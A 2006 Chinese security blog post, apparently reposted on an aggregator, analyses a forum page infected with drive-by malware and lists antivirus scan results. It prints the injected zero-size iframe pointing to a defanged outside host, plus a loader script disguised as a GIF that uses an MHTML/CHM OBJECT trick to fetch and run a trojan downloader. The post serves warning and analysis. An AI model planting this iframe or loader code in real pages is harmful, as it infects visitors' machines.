又一个带毒网页
来源:互联网 发布:成都行知小学地址 编辑:程序博客网 时间:2024/04/28 03:14
endurer 原创
2006-04-08 第1版
网页:hxxp://www.***ai49.com/bbs/reg.asp
有2处被插入了代码:<iframe height=0 width=0 src="hxxp://down.***gament.net/q/f"></iframe>
hxxp://down.***gament.net/q/f的代码为:
<script language="javascript" src="ah.js"></script>
ah.js的代码为:
GIF89a
var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:%40MSITStore%3Amhtml%3Ac%3A//%2Emht%21'+GIF89a+'%2f1.js::/%23"></OBJECT>');
冒充GIF文件,下载运行1.js。
1.js其实是个CHM文件,会释放/运行.exe文件。Kaspersky报为Trojan-Downloader.Win32.Delf.aet,瑞星报为Trojan.DL.Small.hm。
File: 1.js Status:
INFECTED/MALWARE
MD5 617449ed78325096128e604f1e9f9d30 Packers detected: -
Scanner results
AntiVir Found Heuristic/Trojan.Downloader (probable variant)
ArcaVir Found Trojan.Downloader.Delf.Aet
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found Trojan.Html.Gamect.A, Trojan.Downloader.Delf.AET
ClamAV Found Exploit.HTML.ObjCode-2
Dr.Web Found Exploit.CodeBase, Trojan.DownLoader.6966
F-Prot Antivirus Found HTML/ObjCode@expl
Fortinet Found nothing
Kaspersky Anti-Virus Found Trojan-Downloader.Win32.Delf.aet
NOD32 Found Win32/TrojanDownloader.Small.AAO, Win32/TrojanDownloader.Delf.AET
Norman Virus Control Found nothing
UNA Found nothing
VirusBuster Found nothing
VBA32 Found Trojan-Downloader.Win32.Delf.aet
- 又一个带毒网页
- 又一个带毒的政府网站(第3版)
- html的网页也会带毒吗?网页带毒一般什么回事?
- 带毒网页成互联网公害 Google、江民积极应对
- 又一个带前端项目开发完成
- 毒
- 毒
- 毒...
- 毒......
- 毒
- 中国黑客利用贝.布托死讯传毒 带毒网站在Google排名第三
- 小心来自lovebj20080808@163.com的带毒电子邮件
- “满城尽带木马毒” 下《黄金甲》三四成带毒
- 这网页速度很慢,或者有病毒
- 你好毒,你好毒
- [2006-03-22]又发现一个带毒网站(第3版)
- 小心主题为:“最近好吗?怎么联系不上你”的带毒邮件
- 小心主题为:“我的号码没变,还是原来那个!”的带毒邮件
- cygwin下启动的时候PATH设置的脚本文件
- 处理分页问题
- 李彦宏董事会怒摔手机!!
- 根据硬盘号验证是否注册
- winApi Sample
- 又一个带毒网页
- 去除TreeView控件的在显示不完整时出现的黄色提示框
- c++出错提示
- 提不起精神啊!!
- VB6.0数据库访问技术与例程解析(一)
- 在窗体中调用记事本
- C++,VC资源
- 构想本身不具有意义--亚马逊书店的成功秘诀
- 选中指定的文件或文件夹